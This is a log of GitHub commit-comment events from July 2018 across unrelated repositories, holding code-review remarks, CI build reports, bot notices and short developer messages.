{"id":"7958370629","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29690259,"position":null,"line":null,"path":null,"commit_id":"f524275c8f5b9ffba31c2a279e30c7b1eb6fc26f","created_at":"2018-07-12T19:55:14Z","updated_at":"2018-07-12T19:55:14Z","author_association":"COLLABORATOR","body":"Puzzle `6-2cc9aa8f` disappeared from [`src/main/java/io/zold/api/Wallet.java`](https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/Wallet.java), that's why I closed #17. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-12T19:55:14Z"}
{"id":"7958377805","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29690278,"position":42,"line":42,"path":"HomeWork5/Task1-4/SumElement.java","commit_id":"86d3c07beae05d4e10a73d50f79978ed1b7f126d","created_at":"2018-07-12T19:56:46Z","updated_at":"2018-07-12T19:56:46Z","author_association":"OWNER","body":"добре було би спробувати використати лише один цикл, але так теж правильно"}},"created_at":"2018-07-12T19:56:46Z"}
{"id":"7958380407","type":"CommitCommentEvent","actor":{"login":"Brantone"},"repo":{"name":"chef-cookbooks/chef-client"},"payload":{"comment":{"id":29690286,"position":11,"line":91,"path":"libraries/helpers.rb","commit_id":"44ce88bc06749ecef859c3551d4235617c93d321","created_at":"2018-07-12T19:57:19Z","updated_at":"2018-07-12T19:57:19Z","author_association":"NONE","body":"Ok, what am I missing that this addition is causing errors ala: https://github.com/windowschefcookbooks/visualstudio/issues/28\r\n? "}},"created_at":"2018-07-12T19:57:19Z"}
{"id":"7958380449","type":"CommitCommentEvent","actor":{"login":"dylanavery720"},"repo":{"name":"vineyard-bloom/vineyard-bitcoin"},"payload":{"comment":{"id":29690287,"position":null,"line":null,"path":null,"commit_id":"599bccfaeb7ba7920f290c5541b42158b8f577f2","created_at":"2018-07-12T19:57:20Z","updated_at":"2018-07-12T19:57:20Z","author_association":"NONE","body":"@silentorb I am not sure if this is correct or not because I'm not sure where you were thinking you could grab some of these values like \"number\" , \"coinbase\", etc... \r\n\r\nI chose \"nonce\" and \"chainwork\" for the former and the latter. Lets make sure to go over this when you are at your keyboard. "}},"created_at":"2018-07-12T19:57:20Z"}
{"id":"7958380657","type":"CommitCommentEvent","actor":{"login":"toppole69"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29690288,"position":5,"line":40,"path":"CONTRIBUTING.md","commit_id":"41c2df0162a30b3a1f6eeec1566d01bed5203bf0","created_at":"2018-07-12T19:57:22Z","updated_at":"2018-07-12T19:57:22Z","author_association":"NONE","body":"40"}},"created_at":"2018-07-12T19:57:22Z"}
{"id":"7958382508","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29690291,"position":null,"line":null,"path":null,"commit_id":"d181575e936db74c4e66f287eab2ec9eb16ee4c3","created_at":"2018-07-12T19:57:47Z","updated_at":"2018-07-12T19:57:47Z","author_association":"CONTRIBUTOR","body":"is there a reason why you mix **source** and **original**?"}},"created_at":"2018-07-12T19:57:47Z"}
{"id":"7958383789","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29690296,"position":48,"line":480,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"d181575e936db74c4e66f287eab2ec9eb16ee4c3","created_at":"2018-07-12T19:58:04Z","updated_at":"2018-07-12T19:58:04Z","author_association":"CONTRIBUTOR","body":"i also missed something:\r\n\"[...] **Internal/Cache** counter was higher.\""}},"created_at":"2018-07-12T19:58:04Z"}
{"id":"7958386581","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Friends"},"payload":{"comment":{"id":29690302,"position":null,"line":null,"path":null,"commit_id":"822074cd79c57d94a800081c60e513d2ee725746","created_at":"2018-07-12T19:58:40Z","updated_at":"2018-07-12T19:58:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create the necessary friend components](https://trello.com/c/afZXuWah/7-create-the-necessary-friend-components)"}},"created_at":"2018-07-12T19:58:40Z"}
{"id":"7958387843","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Friends"},"payload":{"comment":{"id":29690306,"position":null,"line":null,"path":null,"commit_id":"4631eab8050dd4e48e6054fc72c9169e79c35c61","created_at":"2018-07-12T19:58:57Z","updated_at":"2018-07-12T19:58:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Initialize the Project](https://trello.com/c/4zNhyAGM/3-initialize-the-project)"}},"created_at":"2018-07-12T19:58:57Z"}
{"id":"7958387908","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Friends"},"payload":{"comment":{"id":29690307,"position":null,"line":null,"path":null,"commit_id":"627db5958cf678ba72ea139c4b8586516aa57905","created_at":"2018-07-12T19:58:59Z","updated_at":"2018-07-12T19:58:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Initialize the Project](https://trello.com/c/4zNhyAGM/3-initialize-the-project)"}},"created_at":"2018-07-12T19:58:59Z"}
{"id":"7958389377","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Friends"},"payload":{"comment":{"id":29690308,"position":null,"line":null,"path":null,"commit_id":"633e72fb4f98fc6e74352915d2cb2305168a8a30","created_at":"2018-07-12T19:59:17Z","updated_at":"2018-07-12T19:59:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Initialize the Project](https://trello.com/c/4zNhyAGM/3-initialize-the-project)"}},"created_at":"2018-07-12T19:59:17Z"}
{"id":"7953509210","type":"CommitCommentEvent","actor":{"login":"theoneandonlylov"},"repo":{"name":"theoneandonlylov/MoneyMakerPayForwardTakerr"},"payload":{"comment":{"id":29679225,"position":null,"line":null,"path":null,"commit_id":"00250b6a5275be2b5d0ca40b8a214340c40746a1","created_at":"2018-07-12T02:00:56Z","updated_at":"2018-07-12T02:00:56Z","author_association":"OWNER","body":"Who wants to help me build a custom web page and application for cell phones, and to make money threw a game, online casino or also I need a web page that stands out from the rest, maybe having all these features inside of it, able to generate traffic and make advertising income and sales of products. Anyone willing to work with me as business partners>\r\n"}},"created_at":"2018-07-12T02:00:56Z"}
{"id":"7953515848","type":"CommitCommentEvent","actor":{"login":"skarzhevskyy"},"repo":{"name":"skarzhevskyy/gwt-mock-2.5.1"},"payload":{"comment":{"id":29679235,"position":null,"line":null,"path":null,"commit_id":"7e675841d3d19a627383fe2d39f5850c8793c9e2","created_at":"2018-07-12T02:03:27Z","updated_at":"2018-07-12T02:03:27Z","author_association":"OWNER","body":"@gabor-farkas there are couple of more changed GWT 2.8 targeted.  will you accept such changer to gwt-mock-2.5.1? "}},"created_at":"2018-07-12T02:03:27Z"}
{"id":"7953520908","type":"CommitCommentEvent","actor":{"login":"tdewolff"},"repo":{"name":"tdewolff/minify"},"payload":{"comment":{"id":29679243,"position":7,"line":49,"path":"css/css_test.go","commit_id":"835afedd1a7d95549ad735ed1c5ba3d357e21674","created_at":"2018-07-12T02:05:27Z","updated_at":"2018-07-12T02:05:27Z","author_association":"OWNER","body":"Well, `*zoom` gives a declaration error, in which case the contents could be anything. It just prints out the whole content, as no assumptions can be made. I guess `minify` could check if it _looks_ like a declaration (with a colon), and remove spaces, but I'm really not sure if we should. We could put in a bit of a hack, and remove whitespace after colons in `BadDeclarations`."}},"created_at":"2018-07-12T02:05:27Z"}
{"id":"7953522341","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29679245,"position":12,"line":12,"path":"oni-bin/lilac.py","commit_id":"bff35646608398de5a629fa8dc2362bb63a61272","created_at":"2018-07-12T02:06:03Z","updated_at":"2018-07-12T02:06:03Z","author_association":"MEMBER","body":"这里可以用 `update_pkgver_and_pkgrel(version)` 的。"}},"created_at":"2018-07-12T02:06:03Z"}
{"id":"7953522556","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679246,"position":null,"line":null,"path":null,"commit_id":"d022a70906164211e1cfaa73227b73080583f16e","created_at":"2018-07-12T02:06:08Z","updated_at":"2018-07-12T02:06:08Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2813 of 2973 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 149 tests had: EIO diffs.\n * 146 tests had: Table big diffs.\n * 9 tests had: ESO small diffs.\n * 4 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 18 tests had: ESO big diffs.\n * 6 tests had: MTR big diffs.\n\nFailures:\n\n\nperformance Test Summary\n * Passed: 4\n * Failed: 13\n\nregression Test Summary\n * Passed: 496\n * Failed: 147\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.62%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T02:06:08Z"}
{"id":"7953524914","type":"CommitCommentEvent","actor":{"login":"rulixiang"},"repo":{"name":"rulixiang/blog"},"payload":{"comment":{"id":29679248,"position":null,"line":null,"path":null,"commit_id":"906c61173ce3d0be32830d9b97a3cb2f515bb672","created_at":"2018-07-12T02:07:04Z","updated_at":"2018-07-12T02:07:04Z","author_association":"OWNER","body":"add images of blog(bovw)."}},"created_at":"2018-07-12T02:07:04Z"}
{"id":"7953525120","type":"CommitCommentEvent","actor":{"login":"mengdonglin"},"repo":{"name":"thesofproject/sof"},"payload":{"comment":{"id":29679249,"position":null,"line":null,"path":null,"commit_id":"3debb9e20f74e64c558c0913c94924a09041885f","created_at":"2018-07-12T02:07:08Z","updated_at":"2018-07-12T02:07:08Z","author_association":"COLLABORATOR","body":"Building failure observed by SOF CI.\r\n\r\nSUMMARY\r\n=======\r\nstage: build\r\nresult: FAILED\r\nSuccessful Platform: None\r\nFailed Platform:  baytrail apollolake cannonlake trigger commit: SOF Firmware\r\n\r\nSOF Firmware COMMIT\r\n===================\r\nbranch : sof/master\r\ncommit : 3debb9e20f74e64c558c0913c94924a09041885f\r\nsubject:  wsBcBAABCAAQBQJbRRYoCRBK7hj4Ov3rIwAAdHIIAIML9uRtin4utyXjpWHb+UFE\r\ndate   : 2018-07-11 04:25:12 +0800\r\nauthor : Liam Girdwood <lgirdwood@gmail.com>\r\n\r\nSOF Topology COMMIT\r\n===================\r\nbranch : soft/master\r\ncommit : 764f9536cdb196d46f653f542a18d43c0fc2fd1d\r\nsubject:  wsBcBAABCAAQBQJbQ+DvCRBK7hj4Ov3rIwAAdHIIAGTmNxaQquACtzJ+CzFYW3k7\r\ndate   : 2018-07-10 06:25:51 +0800\r\nauthor : Liam Girdwood <lgirdwood@gmail.com>\r\n\r\nDETAILS\r\n=======\r\nPlatform: baytrail FAIL\r\nLogs for Debug:\r\nstdout: http://bee.sh.intel.com/~lkp//result/build-sof/baytrail/3debb9e20f74e64c558c0913c94924a09041885f/764f9536cdb196d46f653f542a18d43c0fc2fd1d/0/stdout\r\nstderr: http://bee.sh.intel.com/~lkp//result/build-sof/baytrail/3debb9e20f74e64c558c0913c94924a09041885f/764f9536cdb196d46f653f542a18d43c0fc2fd1d/0/stderr\r\n\r\nPlatform: apollolake FAIL\r\nLogs for Debug:\r\nstdout: http://bee.sh.intel.com/~lkp//result/build-sof/apollolake-up2/3debb9e20f74e64c558c0913c94924a09041885f/764f9536cdb196d46f653f542a18d43c0fc2fd1d/0/stdout\r\nstderr: http://bee.sh.intel.com/~lkp//result/build-sof/apollolake-up2/3debb9e20f74e64c558c0913c94924a09041885f/764f9536cdb196d46f653f542a18d43c0fc2fd1d/0/stderr\r\n\r\nPlatform: cannonlake FAIL\r\nLogs for Debug:\r\nstdout: http://bee.sh.intel.com/~lkp//result/build-sof/cannonlake/3debb9e20f74e64c558c0913c94924a09041885f/764f9536cdb196d46f653f542a18d43c0fc2fd1d/0/stdout\r\nstderr: http://bee.sh.intel.com/~lkp//result/build-sof/cannonlake/3debb9e20f74e64c558c0913c94924a09041885f/764f9536cdb196d46f653f542a18d43c0fc2fd1d/0/stderr\r\n\r\n\r\n\r\nJenkins Info for CI Developers\r\n==============================\r\nCheck console output at http://bee.sh.intel.com:8080/job/lkp-sof/556/\r\nLogs path: '/result/build-sof/cannonlake/3debb9e20f74e64c558c0913c94924a09041885f/764f9536cdb196d46f653f542a18d43c0fc2fd1d/0'\r\n"}},"created_at":"2018-07-12T02:07:08Z"}
{"id":"7953527591","type":"CommitCommentEvent","actor":{"login":"ATechnoHazard"},"repo":{"name":"shanutheflash/tgbot"},"payload":{"comment":{"id":29679250,"position":null,"line":null,"path":null,"commit_id":"3d647e00d7749e21b12ebcbdb31596a31c541e60","created_at":"2018-07-12T02:08:04Z","updated_at":"2018-07-12T02:08:04Z","author_association":"NONE","body":"You don't need a server to cherry pick. You don't even need Linux. Git for\nwindows exists and works well enough.\n\nOn Thu 12 Jul, 2018, 7:21 AM Shanu Flash #noυ, <notifications@github.com>\nwrote:\n\n> @krypticallusion <https://github.com/krypticallusion> K 😅, don't have\n> server to cherrypick or something, sorry.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/shanutheflash/tgbot/commit/3d647e00d7749e21b12ebcbdb31596a31c541e60#commitcomment-29679172>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AeSlswmGOx2HJZYZwfOpyRtkni9XUAQmks5uFqu9gaJpZM4VFndV>\n> .\n>\n"}},"created_at":"2018-07-12T02:08:04Z"}
{"id":"7953530143","type":"CommitCommentEvent","actor":{"login":"Cindy19970928"},"repo":{"name":"SummerProgram2018/AdvenShare"},"payload":{"comment":{"id":29679256,"position":null,"line":null,"path":null,"commit_id":"f2230c07a5a7b81aa448ea0a6cc0d47b50926bd6","created_at":"2018-07-12T02:09:00Z","updated_at":"2018-07-12T02:09:00Z","author_association":"CONTRIBUTOR","body":"[Images.zip](https://github.com/SummerProgram2018/AdvenShare/files/2186822/Images.zip)\r\n"}},"created_at":"2018-07-12T02:09:00Z"}
{"id":"7953532240","type":"CommitCommentEvent","actor":{"login":"nomis52"},"repo":{"name":"OpenLightingProject/ola"},"payload":{"comment":{"id":29679258,"position":6,"line":9,"path":"libola.pc.in","commit_id":"bcff9c884cf59c1a86a7495235cb9cd988cb0e50","created_at":"2018-07-12T02:09:50Z","updated_at":"2018-07-12T02:09:50Z","author_association":"MEMBER","body":"I can't think of one. "}},"created_at":"2018-07-12T02:09:50Z"}
{"id":"7953533998","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679259,"position":null,"line":null,"path":null,"commit_id":"d022a70906164211e1cfaa73227b73080583f16e","created_at":"2018-07-12T02:10:31Z","updated_at":"2018-07-12T02:10:31Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T02:10:31Z"}
{"id":"7953538119","type":"CommitCommentEvent","actor":{"login":"Cindy19970928"},"repo":{"name":"SummerProgram2018/AdvenShare"},"payload":{"comment":{"id":29679265,"position":null,"line":null,"path":null,"commit_id":"f2230c07a5a7b81aa448ea0a6cc0d47b50926bd6","created_at":"2018-07-12T02:12:09Z","updated_at":"2018-07-12T02:12:09Z","author_association":"CONTRIBUTOR","body":"![1](https://user-images.githubusercontent.com/40679362/42608716-b982bf60-85bb-11e8-8bee-bf60893a1299.jpg)\r\n![2](https://user-images.githubusercontent.com/40679362/42608717-bac1fa44-85bb-11e8-9ab5-07618ab458a2.jpg)\r\n![3](https://user-images.githubusercontent.com/40679362/42608719-bbc6ab7e-85bb-11e8-9242-e4c343fb4238.jpg)\r\n![4](https://user-images.githubusercontent.com/40679362/42608722-bcd028ce-85bb-11e8-8f87-33135fbee762.jpg)\r\n![5](https://user-images.githubusercontent.com/40679362/42608725-be0b2dc4-85bb-11e8-8d91-07069327be42.jpg)\r\n![6](https://user-images.githubusercontent.com/40679362/42608726-c014f38e-85bb-11e8-94a1-e84703e8d6e3.jpg)\r\n![7](https://user-images.githubusercontent.com/40679362/42608729-c15cd310-85bb-11e8-92de-8ca639e8bf58.jpg)\r\n![8](https://user-images.githubusercontent.com/40679362/42608732-c34b445e-85bb-11e8-9737-5b06b2265ae7.jpg)\r\n![9](https://user-images.githubusercontent.com/40679362/42608733-c41f1720-85bb-11e8-8fd5-6fcd251aed56.jpg)\r\n![10](https://user-images.githubusercontent.com/40679362/42608734-c5948f36-85bb-11e8-8900-4d468cf7a002.jpg)\r\n![11](https://user-images.githubusercontent.com/40679362/42608736-c70db108-85bb-11e8-9063-156d7dcdd0e0.jpg)\r\n![12](https://user-images.githubusercontent.com/40679362/42608737-c82c111a-85bb-11e8-9159-3403c50caa77.jpg)\r\n![13](https://user-images.githubusercontent.com/40679362/42608740-c924544c-85bb-11e8-9439-fc5de8c00a60.jpg)\r\n![14](https://user-images.githubusercontent.com/40679362/42608743-caa1b76a-85bb-11e8-801d-9194aca44838.jpg)\r\n![15](https://user-images.githubusercontent.com/40679362/42608745-cd0e4d9c-85bb-11e8-89d6-a969a3b4b9a7.png)\r\n![16](https://user-images.githubusercontent.com/40679362/42608748-d09bb364-85bb-11e8-8524-6e724098fdea.png)\r\n![17](https://user-images.githubusercontent.com/40679362/42608750-d1a5d73a-85bb-11e8-9224-e5b58283311c.png)\r\n"}},"created_at":"2018-07-12T02:12:09Z"}
{"id":"7953541793","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29679269,"position":null,"line":null,"path":null,"commit_id":"eb2e5acbf8ad9b9fc8d3c83789190b31e284f710","created_at":"2018-07-12T02:13:30Z","updated_at":"2018-07-12T02:13:30Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.216`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/216) :tada:"}},"created_at":"2018-07-12T02:13:30Z"}
{"id":"7953543720","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"donghyunele/SpringBasic"},"payload":{"comment":{"id":29679275,"position":4,"line":43,"path":"src/main/java/com/example/basic/controller/HomeController.java","commit_id":"680f81a3b93a146ff7763c64bc4e5b705fcba9e4","created_at":"2018-07-12T02:14:14Z","updated_at":"2018-07-12T02:14:14Z","author_association":"NONE","body":"Logger logger = LoggerFactory.getLogger()~~\r\n"}},"created_at":"2018-07-12T02:14:14Z"}
{"id":"7953544281","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29679276,"position":null,"line":null,"path":null,"commit_id":"eb2e5acbf8ad9b9fc8d3c83789190b31e284f710","created_at":"2018-07-12T02:14:28Z","updated_at":"2018-07-12T02:14:28Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.327`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/402931908) :tada:"}},"created_at":"2018-07-12T02:14:28Z"}
{"id":"7953545098","type":"CommitCommentEvent","actor":{"login":"Arnish"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29679282,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-12T02:14:46Z","updated_at":"2018-07-12T02:14:46Z","author_association":"NONE","body":"@rachelew10 Yep I did that! Still getting nothing. Do you have a discord? I'd lvoe it if you added me so i can copy past what i have in the config file and you fix it for me :,)"}},"created_at":"2018-07-12T02:14:46Z"}
{"id":"7953545150","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"donghyunele/SpringBasic"},"payload":{"comment":{"id":29679283,"position":8,"line":10,"path":"src/main/java/com/example/basic/VO/BVO.java","commit_id":"680f81a3b93a146ff7763c64bc4e5b705fcba9e4","created_at":"2018-07-12T02:14:47Z","updated_at":"2018-07-12T02:14:47Z","author_association":"NONE","body":"럼복 스펙 한번 확인해 보세용"}},"created_at":"2018-07-12T02:14:47Z"}
{"id":"7953550443","type":"CommitCommentEvent","actor":{"login":"yumetodo"},"repo":{"name":"antlarr/bard"},"payload":{"comment":{"id":29679294,"position":55,"line":120,"path":"bard/bard_ext.cpp","commit_id":"52bce48eca635f6210036366759ecd9c27ea0924","created_at":"2018-07-12T02:16:50Z","updated_at":"2018-07-12T02:16:50Z","author_association":"NONE","body":"watch #3 "}},"created_at":"2018-07-12T02:16:50Z"}
{"id":"7953552547","type":"CommitCommentEvent","actor":{"login":"hqbrother"},"repo":{"name":"dengleitju/ducter-server"},"payload":{"comment":{"id":29679299,"position":null,"line":null,"path":null,"commit_id":"d1e5a95d8009b6c9fc85d55eaf52f7452f67de9e","created_at":"2018-07-12T02:17:40Z","updated_at":"2018-07-12T02:17:40Z","author_association":"NONE","body":"?"}},"created_at":"2018-07-12T02:17:40Z"}
{"id":"7953556651","type":"CommitCommentEvent","actor":{"login":"hayatoito"},"repo":{"name":"mizuki1029/google-step-tsp"},"payload":{"comment":{"id":29679306,"position":78,"line":78,"path":"tsp_ga_16.java","commit_id":"4787ea62f32648260885e86bbb62913fffa79bd1","created_at":"2018-07-12T02:19:18Z","updated_at":"2018-07-12T02:19:18Z","author_association":"NONE","body":"Math.pow ってわりと重い処理なので、ある都市とある都市の間の距離は一回だけ計算して、その値を次回以降は再利用したほうがよいです。このcaculateDistanceはループの中で毎回、何度も呼ばれている気がします。\r\n\r\ndouble distance[][] = new double[N][N];\r\n\r\nのようなものを作って、最初にすべての2点間の距離を計算してここにいれて、\r\n次回以降は、距離はこの2次元配列からルックアップするとよいと思います。"}},"created_at":"2018-07-12T02:19:18Z"}
{"id":"7953560279","type":"CommitCommentEvent","actor":{"login":"meronaaa"},"repo":{"name":"object402/imgmap"},"payload":{"comment":{"id":29679311,"position":null,"line":null,"path":null,"commit_id":"d9a1eb2c85fe4228ddcf924eeee13c5aaeca0089","created_at":"2018-07-12T02:20:44Z","updated_at":"2018-07-12T02:20:44Z","author_association":"NONE","body":"11101011 10110000 10010100 11101011 10110011 10110100 11101010 10110000 10011001 11101100 10010101 10000100\r\nhttp://www.unit-conversion.info/texttools/convert-text-to-binary/#data"}},"created_at":"2018-07-12T02:20:44Z"}
{"id":"7953561667","type":"CommitCommentEvent","actor":{"login":"s26b03"},"repo":{"name":"s26b03/Backend-"},"payload":{"comment":{"id":29679312,"position":2,"line":2,"path":"README.md","commit_id":"2202af73f5b1b61b42f34c59f076c5d6476f7485","created_at":"2018-07-12T02:21:18Z","updated_at":"2018-07-12T02:21:18Z","author_association":"OWNER","body":"is an episode by episode breakdown of a season of SharkTank ( A popular reality TV show, where entrepreneurs pitch their startups in front of investors (also called sharks) and walk away with funding from some or all of the investors on the panel or nothing ) write a program that takes above url\r\nhttps://gist.githubusercontent.com/murtuzakz/4bd887712703ff14c9b0f7c18229b332/raw/d0dd1c 59016e2488dcbe0c8e710a1c5df9c3672e/season7.json\r\n"}},"created_at":"2018-07-12T02:21:18Z"}
{"id":"7953561677","type":"CommitCommentEvent","actor":{"login":"mikebostanci"},"repo":{"name":"mikebostanci/java"},"payload":{"comment":{"id":29679313,"position":null,"line":null,"path":null,"commit_id":"def423ec9b47114cb7a2897fe59caea458f11159","created_at":"2018-07-12T02:21:18Z","updated_at":"2018-07-12T02:21:18Z","author_association":"OWNER","body":"this is running on jenkins"}},"created_at":"2018-07-12T02:21:18Z"}
{"id":"7953567739","type":"CommitCommentEvent","actor":{"login":"hayatoito"},"repo":{"name":"mizuki1029/google-step-tsp"},"payload":{"comment":{"id":29679324,"position":102,"line":102,"path":"tsp_ga_16.java","commit_id":"4787ea62f32648260885e86bbb62913fffa79bd1","created_at":"2018-07-12T02:23:37Z","updated_at":"2018-07-12T02:23:37Z","author_association":"NONE","body":"Arrays.sort が使用できます。:)\r\n\r\nhttps://docs.oracle.com/javase/9/docs/api/java/util/Arrays.html#sort-double:A-"}},"created_at":"2018-07-12T02:23:37Z"}
{"id":"7953568639","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"QuiltedTuba2798/BlockProtector"},"payload":{"comment":{"id":29679325,"position":null,"line":null,"path":null,"commit_id":"2e4e5c1ff1e3117df22443bda9f8f445295f5de7","created_at":"2018-07-12T02:24:00Z","updated_at":"2018-07-12T02:24:00Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/QuiltedTuba2798/BlockProtector/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `a24eec1a-857a-11e8-9690-fd4e7273445c`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-12T02:24:00Z"}
{"id":"7953568657","type":"CommitCommentEvent","actor":{"login":"c2206190880"},"repo":{"name":"c2206190880/Coding100Days"},"payload":{"comment":{"id":29679326,"position":null,"line":null,"path":null,"commit_id":"a56fc81b3c5f575b43247eef6617c5de4a03ec77","created_at":"2018-07-12T02:24:01Z","updated_at":"2018-07-12T02:24:01Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-12T02:24:01Z"}
{"id":"7953570190","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29679329,"position":1,"line":null,"path":"1531362273.96/github_test.txt","commit_id":"8a8924bbd8fe5c74e2c72112b4c795c6a7d9e4fa","created_at":"2018-07-12T02:24:36Z","updated_at":"2018-07-12T02:24:36Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-12T02:24:36Z"}
{"id":"7953586987","type":"CommitCommentEvent","actor":{"login":"Rashed97"},"repo":{"name":"ezio84/device_huawei_berkeley"},"payload":{"comment":{"id":29679354,"position":null,"line":null,"path":null,"commit_id":"1882af102da792f1173c5bf599a82c859bc80b9e","created_at":"2018-07-12T02:30:52Z","updated_at":"2018-07-12T02:30:52Z","author_association":"NONE","body":"Uh, where did these come from?"}},"created_at":"2018-07-12T02:30:52Z"}
{"id":"7953587424","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"QuiltedTuba2798/PluginsInfo"},"payload":{"comment":{"id":29679356,"position":null,"line":null,"path":null,"commit_id":"6a5381c269ff1f01665de1e7e0382944716ed568","created_at":"2018-07-12T02:31:03Z","updated_at":"2018-07-12T02:31:03Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/QuiltedTuba2798/PluginsInfo/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `9e760cc6-857b-11e8-9a04-d66ff00278ec`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-12T02:31:03Z"}
